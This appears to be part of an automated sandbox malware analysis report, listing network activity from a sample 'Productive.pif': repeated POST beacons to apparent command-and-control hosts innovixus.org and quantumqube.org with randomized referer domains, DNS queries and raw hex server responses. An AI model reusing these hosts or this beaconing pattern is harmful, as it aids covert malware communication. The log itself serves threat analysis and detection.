        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hiesillviatodh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uhtbkdvyjqhumldm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnlrmiijumyrblc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gqwdiwgesmmqbuc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdqqigguhwttd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lgmcteylrwj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pvrxsuljbidl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hvndpwnwbwacu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wqdbwvfeech.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sjkpwqnkghscqkf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://djefgljrqdkh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://suqdalimrfqicy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqtyoalpympvkf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chtkbbqpfcbj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wncyumklols.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qbdxmlimtcag.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eodcwtciqyiaexyp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wunoputiqxp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://apangtccxicvmamf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jnsabjmapru.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqujycvfkirka.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mtresyocidihona.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aqkklmnrnhpkt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vnkfqojalqskox.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://awehqepswhquv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pxntnwwggjlminny.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jrlfriflcqu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdxlscanjhqsccba.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jflyucgbnjfl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://exmiqlnoysje.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wbrwwnmfpnrwagie.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yqcsbwloxjtvibs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dwedkvpfmwq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vmdokicfanh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nprcwblspbeqivpr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://emcxspehivv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahxqauvhmlcu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wowrcjhaudjl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vdxdmsrbdonaj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vxyjwacxwarhhgj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xtwnishbpog.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pegwgorkceikyrer.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ofhofalumsgnwu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://skgtpmoomuctocw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmplelvdrywucea.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://isthpejijxf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://orsfktryrnkiso.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://phobbmblunyjq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rasuuocdvpjaj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://snuhsynjennwr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://elmdcvwdjukaeq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://utjbnsqdkeourb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://logblsndysiwbam.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gegwenervbgcob.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ulfhhqwikcxc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbngxclgnxsyi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqjsjfrxeoxuaer.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ryyfhfcsgsyvltg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eklvqjueora.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kufdwkduwqsfk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lgouxkjunur.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tvgiuvegrmafj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mjqgvacykfag.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jsaqjupysfpav.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtbuehdntsgxnoh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://blkwdcqfxmbstw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://inmsltiredciqy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygmvwlxklabs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://viqkyjulrmgyh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yjqkckobobmui.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://obvpnoshpvar.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qormgdwjiubkux.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fsoljuhfifiahicw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pqhtffxbdyutnlkq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jignacudjxpoijk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ybfdygxavjfrun.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://obnirvwmxxnt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akxuljuwgmqbf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://imjllvyhyhhkvjx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_003229BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,13_2_003229BA
        Source: global trafficDNS traffic detected: DNS query: zYiUXMmoWYKVkgToRt.zYiUXMmoWYKVkgToRt
        Source: global trafficDNS traffic detected: DNS query: quantumqube.org
        Source: global trafficDNS traffic detected: DNS query: innovixus.org
        Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jyevwpjwtgxg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: quantumqube.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:34:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 150<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:34:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 37 30 0d 0a 40 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 27 d2 6c ac 11 c6 52 d1 3b 37 d7 a5 36 82 b4 8a ab 80 da 1b be 00 a0 92 05 00 03 0c a7 32 01 0b 00 00 07 00 9e 03 00 00 b5 20 7b d2 ef 60 5b 67 da 60 1b 3d 80 20 1b 00 d4 3b 60 b0 7e d3 97 67 4b b4 1e c8 ed d0 20 bd 40 8a 58 5a eb ae 80 2d 9e cf c7 d0 29 0e c6 49 d0 b1 bd fc 7c 8c 32 b9 fe 3b a4 e5 05 f8 a1 d8 93 b8 55 65 5f f6 fd bf 17 12 b5 95 6d ee d3 f9 dc bf 64 c8 bf a5 0e bc 88 69 71 5d 12 e7 ad 15 58 31 f3 00 a2 49 dd be 2f 03 19 38 61 a7 13 96 63 c1 ac 8c 15 ae 7e 4d 58 42 a0 42 de 02 9b ae 46 44 75 a6 d2 cc c4 71 aa 98 6b bb f3 ca 8f 07 91 15 bd f5 c5 2e 62 3e 55 21 50 56 9a 33 3b 60 ec 7d 95 25 68 a4 e5 90 29 9f be f2 65 92 3e e7 e3 41 0d d3 48 07 84 84 c1 bf d0 6d 40 cb aa 1f 68 8e 3d 9e a8 83 5a b2 b4 3c df fa 86 f8 87 68 16 51 ee 68 46 